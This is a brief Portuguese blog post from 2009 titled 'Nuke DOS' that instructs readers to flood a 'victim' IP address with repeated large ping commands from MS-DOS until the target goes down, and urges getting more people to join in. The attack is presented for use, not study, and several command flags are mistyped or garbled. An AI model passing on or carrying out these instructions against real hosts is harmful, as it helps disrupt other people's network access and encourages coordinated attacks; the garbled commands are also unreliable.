sexta-feira, 20 de março de 2009

Nuke DOS:

Tente o seguinte comando no prompt do MS-DOS:ping -f-l1000 -t ip-da-vitimaouping -t -11000 -f ip-da-vitimaFicando assim:C:\WINDOWS>ping -f-11000 -t ip-da-vitimaouC:\WINDOWS>ping -t -11000 -f ip-da-vitimaRepita o procedimento até a vitima cair. Quanto mais pessoas fazendo isso junto com você, mais rápido será o tombo !!!!

Nenhum comentário:

Postar um comentário